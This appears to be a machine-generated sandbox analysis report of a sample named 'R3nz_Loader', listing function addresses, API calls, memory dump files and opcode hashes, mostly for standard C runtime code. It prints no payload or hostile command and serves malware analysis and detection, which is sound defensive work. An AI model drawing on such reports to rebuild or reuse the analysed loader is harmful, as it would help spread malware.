                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                              • Instruction ID: 190f5109674d444254342633921dc5491c4fcef7153128428ccb87632a490eaf
                                                                              • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                              • Instruction Fuzzy Hash: DE115172540B04AAE730ABB1CC06FCF77BC6F01708F51481EB2BAA6A50DF65F61A4752
                                                                              Function 6CEF780F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CEF7857
                                                                              • __fassign.LIBCMT ref: 6CEF7A3C
                                                                              • __fassign.LIBCMT ref: 6CEF7A59
                                                                              • WriteFile.KERNEL32(?,6CEF5FF3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEF7AA1
                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CEF7AE1
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEF7B89
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                              • String ID:
                                                                              • API String ID: 1735259414-0
                                                                              • Opcode ID: a0100af41d6e0b12a59462d966ed4009dda44e38988df856dc31fd110a42e0c3
                                                                              • Instruction ID: a6b0026c13a18ec102c39e5553e503c2d8e66d977d9fb460777c94f037e74c69
                                                                              • Opcode Fuzzy Hash: a0100af41d6e0b12a59462d966ed4009dda44e38988df856dc31fd110a42e0c3
                                                                              • Instruction Fuzzy Hash: 4CC18071D052588FDB01CFA8C8809DDBBB5EF49318F28816AD865B7741E7319E46CF60
                                                                              Function 6CEF22B7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000001,?,6CEF1F85,6CEF10B0,6CEF0AC9,?,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120,0000000C,6CEF0DFA), ref: 6CEF22C5
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CEF22D3
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CEF22EC
                                                                              • SetLastError.KERNEL32(00000000,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120,0000000C,6CEF0DFA,?,00000001,?), ref: 6CEF233E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 34fd908fa65b1d9d808ee5770bb471e565ffca86ddbfff78375b9c870a2b59dd
                                                                              • Instruction ID: f505e28c71b37c500e40dbda01fd91750325837cbbb0591a67b69392405ddb82
                                                                              • Opcode Fuzzy Hash: 34fd908fa65b1d9d808ee5770bb471e565ffca86ddbfff78375b9c870a2b59dd
                                                                              • Instruction Fuzzy Hash: A901243270E7565EEB0925B56C8CA9E36B8DB2B77C330032DF13081EE2EF9289075195
                                                                              Function 6CEF2433 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CEF24F4,00000000,?,00000001,00000000,?,6CEF256B,00000001,FlsFree,6CEFBD3C,FlsFree,00000000), ref: 6CEF24C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3664257935-2084034818
                                                                              • Opcode ID: 8f164a22c929e9d75f7a5503a97ba4ea6461e65f64c7f92e720d9d170e19940a
                                                                              • Instruction ID: 2b89920c3148692ccf37dc25dd426d9ee15d2daa71d6e951c721938e82c514c5
                                                                              • Opcode Fuzzy Hash: 8f164a22c929e9d75f7a5503a97ba4ea6461e65f64c7f92e720d9d170e19940a
                                                                              • Instruction Fuzzy Hash: 4311A771F416B5ABDF128A689C48B493374AF52778F350210E974E7784D7A0E90286E5
                                                                              Function 6CEF2AEA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CEF2A9C,?,?,6CEF2A64,?,00000001,?), ref: 6CEF2AFF
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CEF2B12
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CEF2A9C,?,?,6CEF2A64,?,00000001,?), ref: 6CEF2B35
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: ecb8bbe5a97e88623912bc87b8cfbcdfab3b0efce124e5c5813db4da93555729
                                                                              • Instruction ID: 7b8a18e6457946cf567e6794a6987d3fb25ec929da78d80a6edb4d722e2b639f
                                                                              • Opcode Fuzzy Hash: ecb8bbe5a97e88623912bc87b8cfbcdfab3b0efce124e5c5813db4da93555729
                                                                              • Instruction Fuzzy Hash: D3F01C31A02219FBDF02AB50DD1DB9E7E79EB45759F204060E931A2690DB348E01DB94
                                                                              Function 6CEF7107 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __alloca_probe_16.LIBCMT ref: 6CEF718B
                                                                              • __alloca_probe_16.LIBCMT ref: 6CEF7251
                                                                              • __freea.LIBCMT ref: 6CEF72BD
                                                                                • Part of subcall function 6CEF62BC: HeapAlloc.KERNEL32(00000000,6CEF5FF3,6CEF5FF3,?,6CEF4CF3,00000220,?,6CEF5FF3,?,?,?,?,6CEF8111,00000001,?,?), ref: 6CEF62EE
                                                                              • __freea.LIBCMT ref: 6CEF72C6
                                                                              • __freea.LIBCMT ref: 6CEF72E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                              • String ID:
                                                                              • API String ID: 1096550386-0
                                                                              • Opcode ID: 51245f174aad9a0f91ee2a8126bb7c3d75188237c0a118552e3033cc964f9ff9
                                                                              • Instruction ID: 724d3ee232c44b204ec86f15bfcffad6545525c175e7c2dafe80cbe0bc978d44
                                                                              • Opcode Fuzzy Hash: 51245f174aad9a0f91ee2a8126bb7c3d75188237c0a118552e3033cc964f9ff9
                                                                              • Instruction Fuzzy Hash: A151A3B2601216ABFB118E68CC40EAB3AB9DF55768F35455DFC34A7B40EB30DC5786A0
                                                                              Function 6CEF8655 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 6CEF866D
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF867F
                                                                              • _free.LIBCMT ref: 6CEF8691
                                                                              • _free.LIBCMT ref: 6CEF86A3
                                                                              • _free.LIBCMT ref: 6CEF86B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 7cf16526a78460caf841e5d595a191cabcb60c69357045231519d60ce008e896
                                                                              • Instruction ID: c6bb65caf34f505ff8dc2bc760c78b70164c6210b2aa5ea9fa1bca94ecb50fe2
                                                                              • Opcode Fuzzy Hash: 7cf16526a78460caf841e5d595a191cabcb60c69357045231519d60ce008e896
                                                                              • Instruction Fuzzy Hash: 04F04432515604579760DA65D485C9E33F9AB0572C7718C0BE079D7F41D730F9824AD4
                                                                              Function 6CEF4133 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID: *?
                                                                              • API String ID: 269201875-2564092906
                                                                              • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                              • Instruction ID: a7395f7160013465e54bf1b74377b4a46f072d6a8ae42bbf7baa8eff8efeed9a
                                                                              • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                              • Instruction Fuzzy Hash: E0616F76E042199FDB14CFA9C9805DDFBF5FF48318B24826AD825E7700E771AE468B90
                                                                              Function 6CEF807C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 6CEF780F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CEF7857
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CEF5FF3,?,00000000,00000000,6CF00360,0000002C,6CEF6064,?), ref: 6CEF81C2
                                                                              • GetLastError.KERNEL32 ref: 6CEF81CC
                                                                              • __dosmaperr.LIBCMT ref: 6CEF820B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                              • String ID: d`l
                                                                              • API String ID: 910155933-4007956071
                                                                              • Opcode ID: d7ab93ad23c7af4732795ba2c640a6203e043b2e3aa0b8840fe6e625d403963c
                                                                              • Instruction ID: 216b159ed947cd2f4adff9b393be2ec03144efba529569e1930b0096148c1c09
                                                                              • Opcode Fuzzy Hash: d7ab93ad23c7af4732795ba2c640a6203e043b2e3aa0b8840fe6e625d403963c
                                                                              • Instruction Fuzzy Hash: 0451D372A40209AAEB218FA6C804BDEBB75AF4731CF34015AE530A7B51D3719A47C761
                                                                              Function 00A52290 Relevance: 6.3, Strings: 5, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4\D$H\D$T\D$`\D$t\D
                                                                              • API String ID: 0-3727539395
                                                                              • Opcode ID: 0368e68f87729029b281933ce024ae631164ee09756e1e67fa335775d7cc7b02
                                                                              • Instruction ID: 66e00f45a7966d97c22c355d91eb2f0f32d431e074c95d60140f1740f8c4b94a
                                                                              • Opcode Fuzzy Hash: 0368e68f87729029b281933ce024ae631164ee09756e1e67fa335775d7cc7b02
                                                                              • Instruction Fuzzy Hash: 9F11FEB9801B688FEF10CF95C8C858DBBB4FB85718F968156C8543B316C7B46909CF98
                                                                              Function 6CEF4047 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 6CEF4669: _free.LIBCMT ref: 6CEF4677
                                                                                • Part of subcall function 6CEF523D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CEF72B3,?,00000000,00000000), ref: 6CEF52E9
                                                                              • GetLastError.KERNEL32 ref: 6CEF40AF
                                                                              • __dosmaperr.LIBCMT ref: 6CEF40B6
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CEF40F5
                                                                              • __dosmaperr.LIBCMT ref: 6CEF40FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                              • String ID:
                                                                              • API String ID: 167067550-0
                                                                              • Opcode ID: 91b66160be5576b0721773801d182f3b04b8a9b66a6b23dafb332828821281c4
                                                                              • Instruction ID: bcfddebafc6a9edf488019e9719f77d160f8866677e4f5a2bd4a98f05d65affa
                                                                              • Opcode Fuzzy Hash: 91b66160be5576b0721773801d182f3b04b8a9b66a6b23dafb332828821281c4
                                                                              • Instruction Fuzzy Hash: 7C21D372604205AFAB109F668E80C5BB7BDEF4136C724861AF93497B40E731ED429BA1
                                                                              Function 6CEF3947 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,6CEF7C57,?,00000001,6CEF6064,?,6CEF8111,00000001,?,?,?,6CEF5FF3,?,00000000), ref: 6CEF394C
                                                                              • _free.LIBCMT ref: 6CEF39A9
                                                                              • _free.LIBCMT ref: 6CEF39DF
                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CEF8111,00000001,?,?,?,6CEF5FF3,?,00000000,00000000,6CF00360,0000002C,6CEF6064), ref: 6CEF39EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_free
                                                                              • String ID:
                                                                              • API String ID: 2283115069-0
                                                                              • Opcode ID: 9eceb27972c431bb5284f3744faa2d93dea7498f4d4156adac00c0ac4d56e3c7
                                                                              • Instruction ID: 86e61305d5e7fb008904e09e28f896339840d2421fcb1e55c4668b09a9e952ba
                                                                              • Opcode Fuzzy Hash: 9eceb27972c431bb5284f3744faa2d93dea7498f4d4156adac00c0ac4d56e3c7
                                                                              • Instruction Fuzzy Hash: 0411E932709504ABEB416E798C81E5F36799BD367CB35462DF23493BC5EF21880B4113
                                                                              Function 6CEF3A9E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3AA3
                                                                              • _free.LIBCMT ref: 6CEF3B00
                                                                              • _free.LIBCMT ref: 6CEF3B36
                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3B41
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_free
                                                                              • String ID:
                                                                              • API String ID: 2283115069-0
                                                                              • Opcode ID: 4718dc2b7a55f8f20a69895a679297e92a3596fe6d63059eac18584bfef1e540
                                                                              • Instruction ID: 3b596c3ad8dbaa916d48f251d28c83ae54e1837565c861f77a716f5359396f7d
                                                                              • Opcode Fuzzy Hash: 4718dc2b7a55f8f20a69895a679297e92a3596fe6d63059eac18584bfef1e540
                                                                              • Instruction Fuzzy Hash: 0811E9327099006BA7416D758C80E5F3A799BD36BCB35462CF53483BC1EB21CD0B4112
                                                                              Function 6CEF8EA6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001), ref: 6CEF8EBD
                                                                              • GetLastError.KERNEL32(?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?,00000001,?,6CEF8132,6CEF5FF3), ref: 6CEF8EC9
                                                                                • Part of subcall function 6CEF8E8F: CloseHandle.KERNEL32(FFFFFFFE,6CEF8ED9,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?,00000001), ref: 6CEF8E9F
                                                                              • ___initconout.LIBCMT ref: 6CEF8ED9
                                                                                • Part of subcall function 6CEF8E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CEF8E80,6CEF88ED,00000001,?,6CEF7BE6,?,?,00000001,?), ref: 6CEF8E64
                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CEF8900,?,00000001,?,00000001,?,6CEF7BE6,?,?,00000001,?), ref: 6CEF8EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                              • String ID:
                                                                              • API String ID: 2744216297-0
                                                                              • Opcode ID: 45923eaa62dfb86530495e65611cefd0bd8d7a870477da27f4f9b5c73a7b5e07
                                                                              • Instruction ID: 9e8bc97175ee8704e1be1d9039313bff7b7b1f752454875d3de2df26fd1e01ca
                                                                              • Opcode Fuzzy Hash: 45923eaa62dfb86530495e65611cefd0bd8d7a870477da27f4f9b5c73a7b5e07
                                                                              • Instruction Fuzzy Hash: E7F01C36A10118FBCF222F96DC04A8E3F76EB4A3A9B144011FA3899620C7328D20DB94
                                                                              Function 6CEF3274 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 6CEF327D
                                                                                • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
                                                                                • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
                                                                              • _free.LIBCMT ref: 6CEF3290
                                                                              • _free.LIBCMT ref: 6CEF32A1
                                                                              • _free.LIBCMT ref: 6CEF32B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 9b13a037dd0d3a7337324d4ccd474edf809051383d032c3f820b288dcd76abae
                                                                              • Instruction ID: cdb2a57864bb17a785a2b0a7a8315fffcf20889148caaf02eee0751955cb5d21
                                                                              • Opcode Fuzzy Hash: 9b13a037dd0d3a7337324d4ccd474edf809051383d032c3f820b288dcd76abae
                                                                              • Instruction Fuzzy Hash: BFE04F76E301209B9FA1BF18E4016C53E31E73AA4C310E04BE41403B12D73502AFDF8A
                                                                              Function 6CEF2B78 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
